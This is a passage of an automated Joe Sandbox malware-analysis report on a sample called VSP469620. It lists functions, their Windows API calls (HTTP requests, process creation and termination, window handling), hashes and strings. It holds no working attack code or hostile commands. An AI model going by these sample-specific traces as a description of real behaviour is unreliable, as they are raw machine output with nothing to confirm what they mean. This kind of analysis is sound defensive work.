                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: 025ba30ea49d8d94e3c2d89309535d0ef884967706d2b35dbe021e88f0b1f657
                                                              • Instruction ID: 709d8c470f6af1199b7f69f49a45838531290b64ae3ee22ea12e9a89be628a16
                                                              • Opcode Fuzzy Hash: 025ba30ea49d8d94e3c2d89309535d0ef884967706d2b35dbe021e88f0b1f657
                                                              • Instruction Fuzzy Hash: 5B9117356002128FCB15EF24D995BA9F3B8FF14305F5482A9E50AA7263DF30AE66CF54
                                                              Function 00ACCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00ACCC15
                                                                • Part of subcall function 00ACCCCD: GetClientRect.USER32(?,?), ref: 00ACCCF6
                                                                • Part of subcall function 00ACCCCD: GetWindowRect.USER32(?,?), ref: 00ACCD37
                                                                • Part of subcall function 00ACCCCD: ScreenToClient.USER32(?,?), ref: 00ACCD5F
                                                              • GetDC.USER32 ref: 00B2D137
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B2D14A
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00B2D158
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00B2D16D
                                                              • ReleaseDC.USER32(?,00000000), ref: 00B2D175
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B2D200
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: 528044f14ea25e84f3ecb89e87319292c71ddbc46dffef0534e3374af62ce5ba
                                                              • Instruction ID: eff1e0ce98fc628f7d1d2d3e86aa64c68496e1204adb6eacfdae95638295fd7b
                                                              • Opcode Fuzzy Hash: 528044f14ea25e84f3ecb89e87319292c71ddbc46dffef0534e3374af62ce5ba
                                                              • Instruction Fuzzy Hash: 4F71A131400205DFCF219F68E885EEA7BB5FF48321F2446A9ED5D6B2A5CB318C91DB60
                                                              Function 00B1ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                                • Part of subcall function 00ACB63C: GetCursorPos.USER32(000000FF), ref: 00ACB64F
                                                                • Part of subcall function 00ACB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00ACB66C
                                                                • Part of subcall function 00ACB63C: GetAsyncKeyState.USER32(00000001), ref: 00ACB691
                                                                • Part of subcall function 00ACB63C: GetAsyncKeyState.USER32(00000002), ref: 00ACB69F
                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00B1ED3C
                                                              • ImageList_EndDrag.COMCTL32 ref: 00B1ED42
                                                              • ReleaseCapture.USER32 ref: 00B1ED48
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00B1EDF0
                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B1EE03
                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00B1EEDC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                              • API String ID: 1924731296-2107944366
                                                              • Opcode ID: a2218e46bc15d91de1fab36983d906bf6a4d4a8f7f11d92f2904d8423ce142e7
                                                              • Instruction ID: 0a29d9d5edb355ff0e44b41cdbe4db930ab897e1b9d2394bc3991ce11a7a3eae
                                                              • Opcode Fuzzy Hash: a2218e46bc15d91de1fab36983d906bf6a4d4a8f7f11d92f2904d8423ce142e7
                                                              • Instruction Fuzzy Hash: 04516871204300AFD714DF28DC96FAA77E8EB88714F50492DF9A5972A2DB70D984CB62
                                                              Function 00B045C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B045FF
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B0462B
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B0466D
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B04682
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B0468F
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B046BF
                                                              • InternetCloseHandle.WININET(00000000), ref: 00B04706
                                                                • Part of subcall function 00B05052: GetLastError.KERNEL32(?,?,00B043CC,00000000,00000000,00000001), ref: 00B05067
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                              • String ID:
                                                              • API String ID: 1241431887-3916222277
                                                              • Opcode ID: 0ee47cabdc5bd9034947e1a4e5cf601558f8f4d2cb3f0e29dbdfed1d76d61d8a
                                                              • Instruction ID: 8c7a4a08359c1f5d42df626855d0eb0b690e06566d6257698bd4fbd8ff6a1e54
                                                              • Opcode Fuzzy Hash: 0ee47cabdc5bd9034947e1a4e5cf601558f8f4d2cb3f0e29dbdfed1d76d61d8a
                                                              • Instruction Fuzzy Hash: B6415BB1501205BBEB129F50DC85FBF7BECEB09344F104196FA059A191EBB19D448BA4
                                                              Function 00B0B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B4DC00), ref: 00B0B715
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B4DC00), ref: 00B0B749
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B0B8C1
                                                              • SysFreeString.OLEAUT32(?), ref: 00B0B8EB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: fd01f191ef901729f0079951ea8355397baf0e442e96e93acb9d4120458d50fd
                                                              • Instruction ID: 839f10c2f189ce6af6afacb3c02db9e2c9494f4cf04ef81df9456021f76b82db
                                                              • Opcode Fuzzy Hash: fd01f191ef901729f0079951ea8355397baf0e442e96e93acb9d4120458d50fd
                                                              • Instruction Fuzzy Hash: A1F14D75A00209EFCF04DF94C888EAEBBB9FF49315F148499F915AB291DB31AE41CB50
                                                              Function 00B124D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B124F5
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B12688
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B126AC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B126EC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1270E
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B1286F
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B128A1
                                                              • CloseHandle.KERNEL32(?), ref: 00B128D0
                                                              • CloseHandle.KERNEL32(?), ref: 00B12947
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                              • String ID:
                                                              • API String ID: 4090791747-0
                                                              • Opcode ID: cf56f5bfaac6f177594753e77b951726c9e08e084390189bdc37a35b6f8a3abf
                                                              • Instruction ID: aad7990ed7d357dda82e0e6a6e60e33abdeea63ae1ac2398eb5e4e9dd3ff534a
                                                              • Opcode Fuzzy Hash: cf56f5bfaac6f177594753e77b951726c9e08e084390189bdc37a35b6f8a3abf
                                                              • Instruction Fuzzy Hash: A8D1A135604240DFCB14EF24C991BAEBBE5EF84320F14899DF9999B2A2DB31DC50CB52
                                                              Function 00B1B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B1B3F4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 64d7e25794edef859336352121bb4ff5051cde716e4c46805ae50593c84e0647
                                                              • Instruction ID: 433afcf919888515f6ca038d61ca0f7bb3963da77ff560b6d2a4b301c173a788
                                                              • Opcode Fuzzy Hash: 64d7e25794edef859336352121bb4ff5051cde716e4c46805ae50593c84e0647
                                                              • Instruction Fuzzy Hash: 21519131500204BBEF209F28DC96FED3BE9EB05314FA48195F625E62E2DB71E9D08B55
                                                              Function 00ACA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B2DB1B
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B2DB3C
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B2DB51
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B2DB6E
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B2DB95
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00ACA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B2DBA0
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B2DBBD
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00ACA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B2DBC8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                              • String ID:
                                                              • API String ID: 1268354404-0
                                                              • Opcode ID: 05aa6ce868419b60604f298813fe7d441443c8fb3b9b37a72fe5d71cf69ac7b3
                                                              • Instruction ID: adc1876bd36feddf10aa9f867898cabac03e1c2c13cb03a2ad297440bf6b0c2d
                                                              • Opcode Fuzzy Hash: 05aa6ce868419b60604f298813fe7d441443c8fb3b9b37a72fe5d71cf69ac7b3
                                                              • Instruction Fuzzy Hash: ED514770600208EFDB20DF68DC96FAA77F8FB18754F210618F94AA7290DB70A990DB50
                                                              Function 00AF7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AF6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AF5FA6,?), ref: 00AF6ED8
                                                                • Part of subcall function 00AF6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AF5FA6,?), ref: 00AF6EF1
                                                                • Part of subcall function 00AF72CB: GetFileAttributesW.KERNEL32(?,00AF6019), ref: 00AF72CC
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00AF75CA
                                                              • _wcscmp.LIBCMT ref: 00AF75E2
                                                              • MoveFileW.KERNEL32(?,?), ref: 00AF75FB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                              • String ID:
                                                              • API String ID: 793581249-0
                                                              • Opcode ID: d83ba8e6ea708e3f9f8ddbbf440239a712d66e2569b91fed4928894506615df6
                                                              • Instruction ID: 56a3a059bfae7886bf3f51899cbe9502e1c955041026b4ecab52a5f573fe3249
                                                              • Opcode Fuzzy Hash: d83ba8e6ea708e3f9f8ddbbf440239a712d66e2569b91fed4928894506615df6
                                                              • Instruction Fuzzy Hash: 1E5101B2A0922D9ADF54EBA4E981DEE73BC9F08310F1044AAF605E3141EA7497C5CB64
                                                              Function 00ACEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B2DAD1,00000004,00000000,00000000), ref: 00ACEAEB
                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00B2DAD1,00000004,00000000,00000000), ref: 00ACEB32
                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00B2DAD1,00000004,00000000,00000000), ref: 00B2DC86
                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B2DAD1,00000004,00000000,00000000), ref: 00B2DCF2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: 5387f6f7ec8694282eba3d5cefd61dc6033197007bafd19fad31250c61469c48
                                                              • Instruction ID: 4de3cdf3b88581301d968f3f51702e9d8f68cd45b4e8d391e5d7e7c78cc51c0b
                                                              • Opcode Fuzzy Hash: 5387f6f7ec8694282eba3d5cefd61dc6033197007bafd19fad31250c61469c48
                                                              • Instruction Fuzzy Hash: 8E41D671209680DAD739CB28AE8DF7A7AE5EB45305F6BC84DF05B87561CA70AC80D721
                                                              Function 00AEB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00AEB26C
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00AEB273
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00AEB288
                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00AEB290
                                                              • DuplicateHandle.KERNEL32(00000000), ref: 00AEB293
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 00AEB2A3
                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00AEB2AB
                                                              • DuplicateHandle.KERNEL32(00000000), ref: 00AEB2AE
                                                              • CreateThread.KERNEL32(00000000,00000000,00AEB2D4,00000000,00000000,00000000), ref: 00AEB2C8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: 72f04cedb3d9faaaa25a3d0d7886c5a92abab91459a798d789546db25ef6fc16
                                                              • Instruction ID: d2328d5364f2475fea88970283bc4be86fd9b5a29228920207330222e6472dbf
                                                              • Opcode Fuzzy Hash: 72f04cedb3d9faaaa25a3d0d7886c5a92abab91459a798d789546db25ef6fc16
                                                              • Instruction Fuzzy Hash: 1D01B6B5640348BFE710ABA5EC4DF6B7BACEB88711F118411FA05DB1A1CAB49C00CB65
                                                              Function 00B0C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                              • API String ID: 0-572801152
                                                              • Opcode ID: 8617e7b6a5cdcf3eb2717293fead4a5ae9207a239dc36627d516072e91afcde2
                                                              • Instruction ID: fe65cb2ca5f70aff30c660230960852c912612f61a7d410351caafedc4b5bd76
                                                              • Opcode Fuzzy Hash: 8617e7b6a5cdcf3eb2717293fead4a5ae9207a239dc36627d516072e91afcde2
                                                              • Instruction Fuzzy Hash: 45E1C171A00219ABDF10DFA4D981BAE7FF5EF48354F1482A9F905AB2C1D770AD41CB90
                                                              Function 00B0BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$_memset
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                              • API String ID: 2862541840-625585964
                                                              • Opcode ID: 4f1a449c1207b8d68f70a31e15e0a586090cdd5a7dd23c681bfb0accadebc990
                                                              • Instruction ID: aec7d7951a4477bda02b90f5d1571ab6aa9270fb2bd8525c77d3346847b20601
                                                              • Opcode Fuzzy Hash: 4f1a449c1207b8d68f70a31e15e0a586090cdd5a7dd23c681bfb0accadebc990
                                                              • Instruction Fuzzy Hash: CF918271A00219ABDF24CF95D884FAEBBF8EF45710F1085A9F515AB290DB709944CFA0
                                                              Function 00B19A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B19B19
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B19B2D
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B19B47
                                                              • _wcscat.LIBCMT ref: 00B19BA2
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B19BB9
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B19BE7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcscat
                                                              • String ID: SysListView32
                                                              • API String ID: 307300125-78025650
                                                              • Opcode ID: 9a8450fd50b99323e78dc872f7161aba4fc6e4360417e61f511db1a59a75133c
                                                              • Instruction ID: 338a006bdeb56f5d35b35d8b55965ed5b732d24d194e40ea51f185c3cb5e3dea
                                                              • Opcode Fuzzy Hash: 9a8450fd50b99323e78dc872f7161aba4fc6e4360417e61f511db1a59a75133c
                                                              • Instruction Fuzzy Hash: 5741B171900348EBEB219FA4DC85FEE77E8EF08350F5048AAF599A7291C7719D84CB60
                                                              Function 00B1172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AF6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AF6554
                                                                • Part of subcall function 00AF6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AF6564
                                                                • Part of subcall function 00AF6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AF65F9
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1179A
                                                              • GetLastError.KERNEL32 ref: 00B117AD
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B117D9
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B11855
                                                              • GetLastError.KERNEL32(00000000), ref: 00B11860
                                                              • CloseHandle.KERNEL32(00000000), ref: 00B11895
                                                              Strings
                                                              Memory Dump Source
